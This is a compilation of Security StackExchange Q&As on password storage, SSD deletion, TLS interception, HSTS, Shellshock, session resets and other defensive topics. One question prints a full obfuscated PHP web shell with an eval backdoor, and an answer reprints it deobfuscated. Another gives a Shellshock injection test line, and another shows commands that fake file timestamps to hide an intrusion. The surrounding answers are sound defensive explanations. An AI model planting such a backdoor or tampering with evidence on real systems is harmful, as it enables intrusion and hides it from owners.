quickly. Want more? There are training programs and certifications to learn Forensics; probably the most common publicly available training is from SANS . I hold their GCFA ("Forensic Analyst") certification. You can also review the Challenges from the Honeynet Project , in which parties compete to unravel the cases given disk images, memory dumps, and malware samples from actual compromises - they submit their reports of what they found, so you can see the sorts of tools used and findings made in this field. Anti-Forensics is a hot topic in the comments - basically, "can't the attacker just hide their traces?" There are ways to chip away at it - see this list of techniques - but it's far from perfect and not what I'd call reliable. When you consider that "the 'God' of cyberespionage" went so far as to occupy the firmware of the hard drive to maintain access to a system without leaving a trace on the system itself - and still got detected - it seems clear that, in the end, it's easier to detect evidence than it is to erase it.
{ "source": [ "https://security.stackexchange.com/questions/103805", "https://security.stackexchange.com", "https://security.stackexchange.com/users/90345/" ] }
103,901
The password manager that I use has instructions to migrate to a new file format: export existing passwords to a temporary text file, change the password manager to the new format, import the passwords from the temporary text file, then securely erase the temporary text file. My hard drive is an SSD (solid state drive), which has its own issues when it comes to securely deleting files (see https://serverfault.com/questions/199672/secure-delete-on-ssd ). Given that I also have full disk encryption turned on, is it safe to just delete the text file normally? Is there a more secure way to do this (use a RAM disk, or export to a USB stick and then destroy the USB stick after the data has been imported)?
I would still recommend using secure delete in your scenario. Should your machine be compromised while you are logged in (malware etc.), full disk encryption will not protect you from an undelete operation via C&C malware, for example. SSDs have problems erasing files, but a number of manufacturers provide utilities for their drives to securely erase files, and while not always perfect, these have been reviewed to perform well. Furthermore, if your drive supports TRIM, a normal Windows 7+ delete should also function fine once the Recycle Bin is emptied. This post helped me understand a lot more last year; hope it helps you: https://raywoodcockslatest.wordpress.com/2014/04/21/ssd-secure-erase/ As for a more secure way to delete the password file, sure, there are plenty of other creative ways, but that all depends on your appetite for pain. Damn good question, thank you for that!
{ "source": [ "https://security.stackexchange.com/questions/103901", "https://security.stackexchange.com", "https://security.stackexchange.com/users/87864/" ] }
103,908
I look after a system which holds a lot of "low grade" information, nothing financial, but name/address/email etc. Someone has suggested that we up the security from the current in-house password encryption algorithm to ICO-recommended hashing/salting. I've done a bit of reading around and am struggling to see the benefit; my argument has gone back to the "experts" who are suggesting this, but they won't (can't) answer my fairly simple question. As far as I can tell, hashing/salting prevents the password being read and decrypted by a hacker, and it's excellent for this, no argument. But unless I'm missing something, in order to read the password value the hacker has to have access to the database so they can steal the password values?... If they have access to the database then they don't actually need the password(s), as they can just steal the data directly from the database, i.e. the application access they gain from the passwords would give them nothing more than reading the database directly?... What am I missing?
Users often use the same passwords on multiple sites. Your site might not have any financial data, but what if the same password is used for their bank, or for an online store? You could argue that this isn't your problem, but it is a common issue, and is why whenever a breach happens, one of the immediate statements is "change your password, and change it on any other sites where you've used the same password". If your site used something like Bcrypt (without flaws in the implementation - see Ashley Madison), the chances of an attacker being able to work out what passwords have been used is slimmer, and it increases the time for users to be able to change their passwords elsewhere. If you just store the password in your DB without any hashing, an attacker can wander off with the email addresses and passwords and start attacking another site immediately. Email address and password pairs are often traded between attackers too, in the form of "combo lists", which means that even if the original attacker is only interested in your site, they might be able to get some benefit by selling the data to someone else. Added in response to comment on question mentioning 2-way encrypted storage The problem with a 2 way encryption approach is that the information to decrypt must be stored somewhere in the system. If an attacker gains access to your database, there is a good chance they have access to your encryption key too. A hash can't be reversed in this way - online tools for reversing hashes effectively look up the hash in a pre-computed list. Even if they don't have the encryption key, they might be able to work out what the key was - they can use a known plaintext attack by entering a password to your system and seeing what the result is. It probably wouldn't be a quick process, but it could be worth doing if there were any high value targets in your data (celebrities, politicians...). On the other hand, with a strong, salted, hash, the only way to find the original password with strong certainty is to hash every possible input, using the appropriate salt. With something like Bcrypt, this would take years, although weak passwords will still be found relatively quickly.
{ "source": [ "https://security.stackexchange.com/questions/103908", "https://security.stackexchange.com", "https://security.stackexchange.com/users/90443/" ] }
104,046
I have a lot of accounts, and until some time ago I used a universal password for all of them. Right now I have a different password for every account, depending on the website that I am logging in to. I use a pattern, and the difference between passwords is the website domain name. I don't want to store my passwords in some kind of password manager. I just want to have a pattern in mind and compose the password based on it (and a piece of paper hidden somewhere safe in the house in case I am really dumb and forget the pattern). Could you suggest some good patterns, so I can pick one or a mix of them to make a better pattern for my passwords? Is there any better way to store passwords but still access them if you need to log in from another computer/device? (I don't really trust password managers.)
None. Use a password manager application to generate a long, random password for each site. Make sure you are not using your master password (or a derivation of your master password) anywhere else. If you do not trust online or commercial password managers, then use one that is open source and works with local files. Edit: For reference, Bruce Schneier published in 2014 a rather complete (and very readable) blog post on why using any kind of pattern for generating passwords is a bad idea.
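If the objection is "I don't really trust password managers", the core point still stands: each password should be random rather than pattern-derived. Here is a minimal sketch using Python's standard secrets module; the length and alphabet are illustrative choices, not a recommendation from this answer.

import secrets
import string

def random_password(length=24):
    alphabet = string.ascii_letters + string.digits + string.punctuation
    # secrets uses the OS CSPRNG, unlike the 'random' module.
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(random_password())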
{ "source": [ "https://security.stackexchange.com/questions/104046", "https://security.stackexchange.com", "https://security.stackexchange.com/users/87210/" ] }
104,338
While on holiday in France in May I received an email from Google "New sign-in". Your Google Account was just used to sign in: Nairobi, Kenya . Tuesday, 26 May 2015 22:10 (East Africa Time). I hastily changed my password. I've never been to Kenya. My question is: How did this happen? I believe I practised good security: My password was long—four words similar to smoke daily us sitting (I chose this password in 2014, upgrading from something similar to m0zzarella ). I never used this password for anything else. I used two-factor authentication to receive codes by SMS (no smartphone, so no authenticator app). I created an app-specific password for my phone's email app (Nokia S40 phone). Why didn't two-factor authentication stop the hacker? Here's what I did on holiday: Checked my email Used a web browser on my phone to log in to a Google website. I can't remember which web browser I used. I had both Nokia Xpress (default browser) and Opera Mini. (Since then a software upgrade replaced the default browser with a version of Opera Mini). I know both of these work by 'sending the data via their servers'. Is it possible a password or SMS was intercepted? All this happened while I was on holiday and using a foreign phone network. Has this happened to anyone else? It's a shame Google didn't prevent the sign-in. Previously on another account Google contacted me "Suspicious sign-in prevented" when someone tried to log in from China.
Your password was not stolen. As you pointed out, Opera Mini uses proxy servers. Per the link provided in thexacre's answer , Google incorrectly identifies the servers as being in Nairobi, Kenya: When you use Opera Mini, you're connected to Opera servers, which download websites you want, compress and transform them, and at the end they are sent to your phone. So the idea is similar to proxy servers. IP address on the screenshot you attached is in fact one of Opera Mini servers, so you shouldn't be worried. I don't know why it's detected as Kenya, you'd better ask Google. So everything was fine except for Google's IP geolocation.
{ "source": [ "https://security.stackexchange.com/questions/104338", "https://security.stackexchange.com", "https://security.stackexchange.com/users/9374/" ] }
104,363
In my company we were writing a small web application which would be hosted and tested under the HSTS protocol. One of my testers complained that the username and password can be seen in cleartext, so it is insecure. I replied that due to the HSTS implementation it can't be decrypted. I pointed out Wireshark logs and proved that it is encrypted. My tester pointed out Firebug in his own browser and said that it is displaying the cleartext username and password, so it is insecure. From the above, here are my analysis and questions: Since HSTS only secures the data as it moves from the browser to the web server, and Firebug is just a browser plugin, it knows everything in the DOM tree, so it can view form fields, usernames and passwords. Is it possible to prevent Firebug from reading the DOM tree? Is revealing the content in Firebug really a vulnerability? If yes, how can I mitigate it?
Sounds like there is some confusion over the protections that different parts of your system provide. HSTS enforces HTTPS for users who have previously visited the site over HTTPS, for a given period. If a user has never visited the HTTPS version of a site, and the site is also available over HTTP (without a redirect to HTTPS), it will do nothing - the traffic will be unencrypted. Firebug accesses data after decryption - it's a debugging tool. If the browser can see it in clear, Firebug can see it in clear. This is not a vulnerability, unless the website is sending data which shouldn't be sent (e.g. passwords from server), in which case the vulnerability lies with the website, not with Firebug. If you are sending passwords from the server to the client, you have a problem - this should never be required. Passwords should be considered as a one way thing - users type them in, and they are checked on server side. This minimises the chance of any passwords being discovered without a larger server compromise.
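For reference, HSTS itself is nothing more than a response header sent over HTTPS. Below is a minimal sketch in Python using Flask (pip install flask); the max-age value is an illustrative choice, and as explained above the header only takes effect once a user has already reached the site over HTTPS.

from flask import Flask

app = Flask(__name__)

@app.after_request
def add_hsts_header(response):
    # Ask browsers to use HTTPS for this host for the next year.
    response.headers["Strict-Transport-Security"] = "max-age=31536000; includeSubDomains"
    return response

@app.route("/")
def index():
    return "Hello over HTTPS"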
{ "source": [ "https://security.stackexchange.com/questions/104363", "https://security.stackexchange.com", "https://security.stackexchange.com/users/11679/" ] }
104,495
I installed Kaspersky Internet Security 2016 on my laptop; in Firefox and Edge the root issuer is Kaspersky Anti-Virus Personal Root Certificate, but in Chrome the root issuer is GeoTrust. To my knowledge a root CA certificate is self-signed by the root, so how did Kaspersky change the issuer name? It also changes the certificate hierarchy. In Firefox the hierarchy is: Kaspersky Anti-Virus Personal Root Certificate www.google.com but in Chrome the hierarchy is: GeoTrust Global CA Google Internet Authority G2 *.google.com I checked some other sites, but all browsers showed me an identical result. Is this related to Google Chrome certificate pinning for some URLs?
This "Kaspersky Anti-Virus Personal Root Certificate" is the sign that your anti-virus is actively intercepting the connection, in effect running a Man-in-the-Middle attack . This can work because your anti-virus runs locally (on your computer) its own certification authority, and inserted the corresponding CA key in the "trusted store" used by your browsers (well, not all of them, since it apparently did not do the job for Chrome -- as was remarked by @Neil, Chrome does not liked to be fooled about Google's certificate). Thus, the anti-virus generates on-the-fly a fake certificate for Google, which fools your browsers. The certificate you see in Edge or Firefox is not the one that Google's server sent, but the imitation produced locally on your computer by Kaspersky. Anti-virus software does such things in order to be able to inspect data as it flows through SSL, without having to hook deep inside the code of the browsers. This is an "honest MitM attack".
{ "source": [ "https://security.stackexchange.com/questions/104495", "https://security.stackexchange.com", "https://security.stackexchange.com/users/36622/" ] }
104,566
Both are binaries, and I guess that AV products know that .scr files which are not screensavers should be handled with "special care". I see quite a lot of "Document.pdf.scr" malware samples and can't explain why it's better than a plain ol' executable...
Probably because user education has focussed on ".exe extensions are bad", so a .scr might have a better chance of being run, especially if the email claimed it was a script to do something useful.
{ "source": [ "https://security.stackexchange.com/questions/104566", "https://security.stackexchange.com", "https://security.stackexchange.com/users/71647/" ] }
104,576
My college administration is forcing us to install a Cyberoam Firewall SSL certificate so that they can view all the encrypted traffic to "improve our security". If I don't install the certificate then I won't be able to use their network. What are the ways I can protect my privacy in such a situation? Will using a VPN be enough to hide all my traffic, or are there other ways?
Don't install their certificate on any device/OS installation which you ever want to use for private activity. Once you do, your traffic is subject to MITM attacks even if you are not using your college's network . Such an attack requires having the private key for the certificate you installed, but in practice this is quite easy because these "security products" are so badly designed, and often use either very weak key generation or use a fixed private key that's the same for all deployments and available to any of their customers. In a comment that's since been moved to chat, TOOGAM wrote: Specific problem known about this specific vendor's certificate "It is therefore possible to intercept traffic from any victim of a Cyberoam device with any other Cyberoam device - or to extract the key from the device and import it into other DPI devices" If you don't need resources on their network, just use wifi tethering on your phone or get a dedicated 3G USB dongle or similar for use when you're on campus. Alternatively, if non-HTTP traffic is not subject to the MITM, you may be able to use a VPN without installing the certificate. In this case, just get a cheap VPN provider or VPN to your home network if you have one. If you do need access to resources that are only available from the campus network, install another OS in a virtual machine with the MITM CA installed only in the VM, and use the browser in the VM for accessing these resources.
{ "source": [ "https://security.stackexchange.com/questions/104576", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91075/" ] }
104,588
In the U.S., many credit card machines at places like gas stations have started asking for your ZIP (postal) code to use a credit card ostensibly to help verify that you really are the cardholder, rather than the card being stolen. My question is simply: Is there any evidence that this actually leads to a significant reduction in successful credit card fraud? It seems to me like this would not be a very useful measure for a machine that requires the card to be present anyway. I would have guessed that the most common way someone would physically end up with your credit card would be if they stole your wallet, in which case they almost certainly have at least one and likely several IDs that include your ZIP code. For example, in my wallet, at the very least, my driver's license, car insurance card, business card, and pilot certificate all have my zip code listed and it would also be trivial to figure out from my voter registration card. Thus, I'm curious if any actual security benefit has been shown for this or not.
Is there any evidence that this actually leads to a significant reduction in successful credit card fraud? Yes there is evidence, and yes, it absolutely has resulted in reducing many types of card fraud. The fraud prevention feature you are referring to is called the Address Verification Service (AVS). The AVS checks that the street number and/or the ZIP code presented at the terminal match the data on file for the card holder at the issuing bank. In real time, the payment processor will return an AVS response, and based on that response the merchant can decide to reject a non-conforming transaction. It has been adopted by nearly every card issuer in the US. See the Merchant Guide to the Visa Address Verification Service for the possible response codes and the configurable reject settings. In a gas station terminal setting, the terminal might be set to reject AVS response codes N and A, for example.
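For illustration only - the field names, the $gatewayResponse array and the transport are hypothetical, since every processor exposes AVS differently - the merchant-side decision might look like this in PHP:

<?php
// Illustrative AVS handling. The response structure ($gatewayResponse,
// 'avs_code') is hypothetical; consult your processor's documentation for
// the real field names.
$gatewayResponse = ['approved' => true, 'avs_code' => 'N'];

// Codes a merchant might choose to reject at an unattended terminal:
// 'N' = neither street number nor ZIP matched, 'A' = street matched, ZIP did not.
$rejectCodes = ['N', 'A'];

if ($gatewayResponse['approved'] && in_array($gatewayResponse['avs_code'], $rejectCodes, true)) {
    // Void/decline the authorization despite the bank's approval.
    echo "Transaction rejected: AVS mismatch ({$gatewayResponse['avs_code']})\n";
} else {
    echo "Transaction accepted\n";
}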
{ "source": [ "https://security.stackexchange.com/questions/104588", "https://security.stackexchange.com", "https://security.stackexchange.com/users/46674/" ] }
104,598
Unpredictability and predictability in security. I am tasked with deciding which is more important in terms of security, if possible with a focus on cyber security. After reading through several articles on cyber security, I noticed that many of the examples used fall under predictability, as most security engineers are dealing with known threats throughout the cyber world; however, is it possible to classify them as part of unpredictability as well? It is impossible to know when an attacker will attack, how he/she will attack, or how many resources he/she will use. Like a vaccine: you do not know when you will get sick, so having regular vaccine shots will keep you safer, in a sense. Similarly, in cyber security, if we are to discuss unpredictability, we will not know what new kinds of attacks are being developed or whether our current defences can withstand such new attacks. In my opinion, unpredictability is without a doubt the more important factor compared to predictability. How should I go about debating and explaining this? Are there any references that I can look into to understand more about this factor? P.S. Such a good question, yet it is closed.
{ "source": [ "https://security.stackexchange.com/questions/104598", "https://security.stackexchange.com", "https://security.stackexchange.com/users/90752/" ] }
104,808
Basically a website I am running got hacked in January and sent out a whole bunch of spam mails, traffic went through the roof, so the hosting company disabled the site back then, but that wasn't communicated well, so I'm dealing with it now. Today, I looked over the files of the website and noticed a file that was created around 5 hours before I got a warning from the hosting company about my webpage spamming. Path of the file is www/root/rss.lib.php , and the content: "< ?php ${"\x47LOB\x41\x4c\x53"}["\x76\x72vw\x65y\x70\x7an\x69\x70\x75"]="a";${"\x47\x4cOBAL\x53"}["\x67\x72\x69u\x65\x66\x62\x64\x71c"]="\x61\x75\x74h\x5fpas\x73";${"\x47\x4cOBAL\x53"}["\x63\x74xv\x74\x6f\x6f\x6bn\x6dju"]="\x76";${"\x47\x4cO\x42A\x4cS"}["p\x69\x6fykc\x65\x61"]="def\x61ul\x74\x5fu\x73\x65_\x61j\x61\x78";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["i\x77i\x72\x6d\x78l\x71tv\x79p"]="defa\x75\x6c\x74\x5f\x61\x63t\x69\x6f\x6e";${"\x47L\x4fB\x41\x4cS"}["\x64\x77e\x6d\x62\x6a\x63"]="\x63\x6fl\x6f\x72";${${"\x47\x4c\x4f\x42\x41LS"}["\x64\x77\x65\x6dbj\x63"]}="\x23d\x665";${${"\x47L\x4fB\x41\x4c\x53"}["\x69\x77\x69rm\x78\x6c\x71\x74\x76\x79p"]}="\x46i\x6cesM\x61n";$oboikuury="\x64e\x66a\x75\x6ct\x5fc\x68\x61\x72\x73\x65t";${${"\x47L\x4f\x42\x41\x4cS"}["p\x69oy\x6bc\x65\x61"]}=true;${$oboikuury}="\x57indow\x73-1\x325\x31";@ini_set("\x65r\x72o\x72_\x6cog",NULL);@ini_set("l\x6fg_er\x72ors",0);@ini_set("max_ex\x65\x63\x75\x74\x69o\x6e\x5f\x74im\x65",0);@set_time_limit(0);@set_magic_quotes_runtime(0);@define("WS\x4f\x5fVE\x52S\x49ON","\x32.5\x2e1");if(get_magic_quotes_gpc()){function WSOstripslashes($array){${"\x47\x4c\x4f\x42A\x4c\x53"}["\x7a\x64\x69z\x62\x73\x75e\x66a"]="\x61\x72r\x61\x79";$cfnrvu="\x61r\x72a\x79";${"GLOB\x41L\x53"}["\x6b\x63\x6ct\x6c\x70\x64\x73"]="a\x72\x72\x61\x79";return is_array(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x7ad\x69\x7ab\x73\x75e\x66\x61"]})?array_map("\x57SOst\x72\x69\x70\x73\x6c\x61\x73\x68\x65s",${${"\x47\x4cO\x42\x41LS"}["\x6b\x63\x6c\x74l\x70\x64\x73"]}):stripslashes(${$cfnrvu});}$_POST=WSOstripslashes($_POST);$_COOKIE=WSOstripslashes($_COOKIE);}function wsoLogin(){header("\x48\x54TP/1.\x30\x204\x30\x34\x20\x4eo\x74 \x46ound");die("4\x304");}function WSOsetcookie($k,$v){${"\x47\x4cO\x42ALS"}["\x67vf\x6c\x78m\x74"]="\x6b";$cjtmrt="\x76";$_COOKIE[${${"G\x4c\x4f\x42\x41LS"}["\x67\x76\x66\x6cxm\x74"]}]=${${"GLO\x42\x41\x4cS"}["\x63\x74\x78\x76t\x6f\x6fknm\x6a\x75"]};$raogrsixpi="\x6b";setcookie(${$raogrsixpi},${$cjtmrt});}$qyvsdolpq="a\x75\x74\x68\x5f\x70\x61s\x73";if(!empty(${$qyvsdolpq})){$rhavvlolc="au\x74h_\x70a\x73\x73";$ssfmrro="a\x75t\x68\x5fpa\x73\x73";if(isset($_POST["p\x61ss"])&&(md5($_POST["pa\x73\x73"])==${$ssfmrro}))WSOsetcookie(md5($_SERVER["H\x54\x54P_\x48\x4f\x53T"]),${${"\x47L\x4f\x42\x41\x4c\x53"}["\x67\x72\x69\x75e\x66b\x64\x71\x63"]});if(!isset($_COOKIE[md5($_SERVER["\x48T\x54\x50\x5f\x48O\x53\x54"])])||($_COOKIE[md5($_SERVER["H\x54\x54\x50_H\x4fST"])]!=${$rhavvlolc}))wsoLogin();}function actionRC(){if(!@$_POST["p\x31"]){$ugtfpiyrum="a";${${"\x47\x4c\x4fB\x41LS"}["\x76r\x76w\x65\x79\x70z\x6eipu"]}=array("\x75n\x61m\x65"=>php_uname(),"p\x68\x70\x5fver\x73\x69o\x6e"=>phpversion(),"\x77s\x6f_v\x65\x72si\x6f\x6e"=>WSO_VERSION,"saf\x65m\x6f\x64e"=>@ini_get("\x73\x61\x66\x65\x5fm\x6fd\x65"));echo 
serialize(${$ugtfpiyrum});}else{eval($_POST["\x70\x31"]);}}if(empty($_POST["\x61"])){${"\x47L\x4fB\x41LS"}["\x69s\x76\x65\x78\x79"]="\x64\x65\x66\x61\x75\x6ct\x5f\x61c\x74i\x6f\x6e";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x75\x6f\x65c\x68\x79\x6d\x7ad\x64\x64"]="\x64\x65\x66a\x75\x6c\x74_\x61\x63\x74\x69\x6fn";if(isset(${${"\x47L\x4f\x42\x41LS"}["\x69\x77ir\x6d\x78lqtv\x79\x70"]})&&function_exists("\x61ct\x69\x6f\x6e".${${"\x47L\x4f\x42\x41\x4cS"}["\x75o\x65ch\x79\x6d\x7a\x64\x64\x64"]}))$_POST["a"]=${${"\x47\x4c\x4f\x42ALS"}["i\x73\x76e\x78\x79"]};else$_POST["a"]="\x53e\x63\x49\x6e\x66o";}if(!empty($_POST["\x61"])&&function_exists("actio\x6e".$_POST["\x61"]))call_user_func("\x61\x63\x74\x69\x6f\x6e".$_POST["a"]);exit; ?> My first thought was to delete the file and make sure my password is secure, but I'm quite new at this, so advice would be appreciated.
I deobfuscated the code for you, which is encoded using Ascii Escapes: <?php $GLOBALS["vrvweypznipu"]="a"; $GLOBALS["griuefbdqc"]="auth_pass"; $GLOBALS["ctxvtooknmju"]="v"; $GLOBALS["pioykcea"]="default_use_ajax"; $GLOBALS["iwirmxlqtvyp"]="default_action"; $GLOBALS["dwembjc"]="color"; $GLOBALS["dwembjc"]="#df5"; $GLOBALS["iwirmxlqtvyp"]="FilesMan"; $oboikuury="default_charset"; $GLOBALS["pioykcea"]=true; $oboikuury = "Windows-1251"; @ini_set("error_log",NULL); @ini_set("log_errors",0); @ini_set("max_execution_time",0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define("WSO_VERSION","2.5.1"); if(get_magic_quotes_gpc()) { function WSOstripslashes($array) { $GLOBALS["zdizbsuefa"]="array"; $cfnrvu="array"; $GLOBALS["kcltlpds"]="array"; return is_array($GLOBALS["zdizbsuefa"]) ? array_map("WSOstripslashes",$GLOBALS["kcltlpds"]) : stripslashes($cfnrvu); } $_POST = WSOstripslashes($_POST); $_COOKIE = WSOstripslashes($_COOKIE); } function wsoLogin() { header("HTTP/1.0 404 Not Found"); die("404"); } function WSOsetcookie($k,$v) { $GLOBALS["gvflxmt"]="k"; $cjtmrt="v"; $COOKIE[$GLOBALS["gvflxmt"]]=$ { $GLOBALS["ctxvtooknmju"] }; $raogrsixpi="k"; setcookie($raogrsixpi,$cjtmrt); } $qyvsdolpq="auth_pass"; if(!empty($qyvsdolpq)) { $rhavvlolc="authpass"; $ssfmrro="auth_pass"; if (isset($_POST["pass"]) &&(md5($_POST["pass"])== $ssfmrro)) { WSOsetcookie(md5($SERVER["HTTPHOST"]),$GLOBALS["griuefbdqc"]); } if(!isset($_COOKIE[md5($_SERVER["HTTP_HOST"])])||($_COOKIE[md5($_SERVER["HTTP_HOST"])]!= $rhavvlolc)) { wsoLogin(); } } function actionRC() { if(!@$_POST["p1"]) { $ugtfpiyrum = "a"; $GLOBALS["vrvweypznipu"] = array("uname"=>php_uname(), "php_version"=>phpversion(), "wso_version"=>WSO_VERSION, "safemode"=>@ini_get("safe_mode")); echo serialize($ugtfpiyrum); } else { eval($_POST["p1"]); } } if(empty($POST["a"])) { $GLOBALS["isvexy"]="default_action"; $GLOBALS["uoechymzddd"]="defaultaction"; if(isset($GLOBALS["iwirmxlqtvyp"]) && function_exists("action".$GLOBALS["uoechymzddd"])) { $_POST["a"]=$GLOBALS["isvexy"]; else { $_POST["a"]="SecInfo"; } } } if(!empty($_POST["a"])&&function_exists("action".$_POST["a"])) { call_user_func("action".$_POST["a"]); } exit; ?> As you can see, it's turning off your error logging , and not allowing you to log errors, then it's setting the max_execution_time to 0 . Judging by these settings, it looks like it's trying to prevent you from finding out if there's an error, and from getting more information about what's going on, in the log files. The max_execution_time variable, along with set_time_limit(0) , may be used to allow the script to run indefinitely . The purpose of this, in general, is to allow large SQL queries to run. So what else does it do? With this line here: eval($_POST["p1"]); ( deobfuscated ) eval($_POST["\x70\x31"]); ( obfuscated ) ...it allows the attacker to execute any kind of PHP code they want on your system. At this point, you are completely unsafe, and should assume everything is compromised on your server. The eval() line is used to create an arbitrary code execution backdoor into your web pages. This line allows them to POST this: yourpage.php?p1=execute_dangerous_code_here , which is pretty dangerous. The entire code is based around hiding itself. If you don't send the p1 variable, then it looks for the PHP version, etc., and puts it into $GLOBALS["vrvweypznipu"] , so it (presumably) can help find other exploits. If you do post it, it executes the code and continues normally. 
Now, this could be pretty error prone -- trying to get your arbitrary code working -- unless you tested it out beforehand, but it won't let you know if there's an error since it has disabled error logging and error display. I highly recommend nuking from orbit with a fresh install. Restore a backup of all of your WordPress files. If you have no backups, and have to rely on what you have on the server, then you'll have to clean them yourself. If you know how to code, look for anything in your PHP files containing the string "eval($" (or even "eval("). You'll need to open the files for editing to ensure they're legitimate and, if not, remove all files containing it. In fact, if you ever see obfuscated code like this, assume it's a hack. There's pretty much no reason to ever code like this; no legitimate service should ever do it.
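As a starting point for that manual clean-up, a rough PHP triage script along these lines (the web root path and the needle list are just examples) will list candidate files; expect false positives, and read every hit yourself before deleting anything.

<?php
// Rough triage: list PHP files under a web root that contain "eval(" or the
// escape/decoding tricks common in web shells. Point $root at your own
// document root; the needles below are examples, not an exhaustive list.
$root    = '/var/www';
$needles = ['eval(', 'base64_decode(', 'gzinflate(', '\x47LOB'];

$it = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
foreach ($it as $file) {
    if (strtolower($file->getExtension()) !== 'php') {
        continue;
    }
    $code = file_get_contents($file->getPathname());
    foreach ($needles as $needle) {
        if (stripos($code, $needle) !== false) {
            printf("%s  (matched: %s, mtime %s)\n",
                   $file->getPathname(), $needle,
                   date('Y-m-d H:i', $file->getMTime()));
            break;
        }
    }
}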
{ "source": [ "https://security.stackexchange.com/questions/104808", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91290/" ] }
104,813
I found this code, followed by several bash commands downloading and running a payload from the web, in the referer field in my Apache error logs. The attack appears to work by converting a command name into a function name for the empty function body, (){ :; } . This is clearly attempting to perform a bash command injection. What servers, configurations, or modules might be vulnerable to this attack?
This is targeting the Shellshock bug (which even has its own tag ): GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. Affected are any systems which run a vulnerable Bash version and a way for an attacker to inject an environment variable. The most well known case is Apache which automatically sets certain environment variables from the request. You don't need a Bash CGI. See this article about Shell Shock Exploitation Vectors for an extensive list. In order to defend against this attack you must update your Bash. To test if your Bash version is vulnerable, you may execute the following line from @EliahKagan's great answer : x='() { :;}; echo VULNERABLE' bash -c : See Everything you need to know about the Shellshock Bash bug or the corresponding CVE for more information.
{ "source": [ "https://security.stackexchange.com/questions/104813", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91293/" ] }
105,124
The OWASP Forgot Password Cheat Sheet suggests: Whenever a successful password reset occurs, the session should be invalidated and the user redirected to the login page I'm failing to understand why this is so important. Is there a security basis for this recommendation and if so, what is it?
Let's say an attacker has your password. You log in and reset it. If the reset doesn't invalidate all existing sessions, the attacker still has access, as long as they don't let their session expire. The reset hasn't actually achieved anything in this scenario. Depending on what the site does, there could also be issues with having you signed in under a password which is now out of date. Let's say your password is used to unlock something: you are signed in with "password1", but the server now has your password saved as "password2" - what happens? This is obviously hypothetical, but hopefully illustrates the point. Redirecting to the login screen is, I guess, just a recommendation. I'm not sure why it matters where you send the user, but from a usability point of view it makes more sense to send the user to a login page rather than the home page.
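As a sketch of one way to implement the recommendation - the $pdo handle and the users.session_generation column are hypothetical - a per-user generation counter lets you invalidate every outstanding session at reset time:

<?php
// One possible approach: bump a per-user counter on password reset so every
// session issued before the reset stops validating, then destroy the current
// session and send the browser to the login page. Table/column names and the
// $pdo handle are hypothetical.
function resetPassword(PDO $pdo, int $userId, string $newPassword): void {
    $stmt = $pdo->prepare(
        'UPDATE users
            SET password_hash = ?, session_generation = session_generation + 1
          WHERE id = ?');
    $stmt->execute([password_hash($newPassword, PASSWORD_DEFAULT), $userId]);

    session_unset();
    session_destroy();               // this browser logs in again like everyone else
    header('Location: /login');
    exit;
}

// On every authenticated request, a stale generation number means "log in again".
function sessionIsCurrent(PDO $pdo, int $userId, int $sessionGeneration): bool {
    $stmt = $pdo->prepare('SELECT session_generation FROM users WHERE id = ?');
    $stmt->execute([$userId]);
    return (int) $stmt->fetchColumn() === $sessionGeneration;
}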
{ "source": [ "https://security.stackexchange.com/questions/105124", "https://security.stackexchange.com", "https://security.stackexchange.com/users/56212/" ] }
105,150
I always thought the greatest benefit of the logs is to confirm to you that your machine has been hacked. However, I see hackers bragging about "rooting" servers all over the Internet. What's stopping a hacker with root access from deleting the logs in order to cover their tracks?
Why is it possible for the root user to delete the logs? Because you need to be able to manage the server. What's stopping a hacker with root access from deleting the logs in order to cover their tracks? Regarding local logging, only their own stupidity. Regarding external logging, their skill set and yours. There are many, many different ways to "log." In fact, you could have the rooted machine log to a separate, hidden device that can't easily be overwritten, such as a Raspberry Pi / Arduino logger, of which I have a few. In Linux, root is supposed to be able to do pretty much everything. In Windows, the same concept applies; if you have root access to a machine, you will be able to do almost anything you want to that machine, which includes deleting logs. You can also log all connections to a certain machine, especially if it isn't supposed to be "accessed" in the first place. How would you find out what's going on, and how would you circumvent it? Here's a way to find all changes in the last 120 minutes: find / -mmin -120 -printf '%p\t%a\n' Nice, huh? Gotcha, hacker! Mwahahaha... but you can change these attributes if you know what you're doing, like so: touch -d "24 hours ago" <file> Even worse, automating it: find / -print | while read file; do touch -d "$(date -r "$file") - 24 hours" "$file"; done But wait, Mark Hulkalo! If all the files were last edited 24 hours ago, then that clearly shows we've got a haxor! True, but you can also apply $RANDOM where 24 exists. Here's an example of a number from 1-24: $((RANDOM % 24) + 1) . Now it doesn't look so easy to discover, does it? But what if all files look like that, especially files which aren't supposed to be changed? Limit the scope to a certain directory, such as /root . There are lots of ways to mask your presence locally. Unless the attacker forgot to cleanse ~/.bash_history , you'll be flying blind. Really, if the only "logging" you have is ~/.bash_history , then you're in trouble if your attacker is at least moderately intelligent. That can be erased on each user account with astounding ease, as long as you have the appropriate permissions. It's much easier to log entries somewhere they won't be easily detected or modified, such as an external device. While it's possible to use forensics to recover your attacker's footprints, it's very, very easy to circumvent if you know what you're doing. This is why external logging is a much better solution. And that's the story of why external logging is generally the answer... keep in mind there are also ways to circumvent external logging. Nothing is ever 100% safe; you can only make it harder for your attacker, not impossible.
{ "source": [ "https://security.stackexchange.com/questions/105150", "https://security.stackexchange.com", "https://security.stackexchange.com/users/31356/" ] }
105,270
We have a public facing e-commerce web site. Our credit card payment provider has told us they won't support RC4 encryption anymore. They said that users with older browsers may or may not be able to place orders on our site. If we disable SSLv3 on our website, what will happen to users with an older browser when they try to access the HTTPS pages?
